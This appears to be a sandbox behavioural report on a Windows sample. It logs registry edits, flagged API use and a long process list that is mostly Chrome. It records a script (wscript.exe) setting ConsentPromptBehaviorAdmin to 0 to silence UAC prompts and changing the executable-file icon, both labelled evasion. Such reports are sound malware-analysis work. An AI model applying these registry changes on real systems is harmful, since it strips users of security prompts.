Key created \REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx\ContextMenuHandlers\{A45AEC2B-549E-405F-AF3E-C6B03C4FDFBF} C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\command C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Bug32\\icon.ico" C:\Windows\System32\wscript.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shellex\ContextMenuHandlers\PlayTo C:\Windows\system32\unregmp2.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\System32\wscript.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: RenamesItself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1208 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe C:\2d1a5f6ae1e78fa0c8bf8beaee61\Setup.exe
PID 1208 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe C:\2d1a5f6ae1e78fa0c8bf8beaee61\Setup.exe
PID 1208 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe C:\2d1a5f6ae1e78fa0c8bf8beaee61\Setup.exe
PID 1892 wrote to memory of 3168 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 3168 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Windows\system32\wscript.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Consentpromptbehavioradmin = "0" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Windows\System32\wscript.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\System32\wscript.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe

"C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe"

C:\2d1a5f6ae1e78fa0c8bf8beaee61\Setup.exe

C:\2d1a5f6ae1e78fa0c8bf8beaee61\\Setup.exe /x86 /x64 /ia64 /web

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb9c1ab58,0x7ffcb9c1ab68,0x7ffcb9c1ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1704 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3096 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4360 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4516 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4648 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4576 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4848 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4620 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

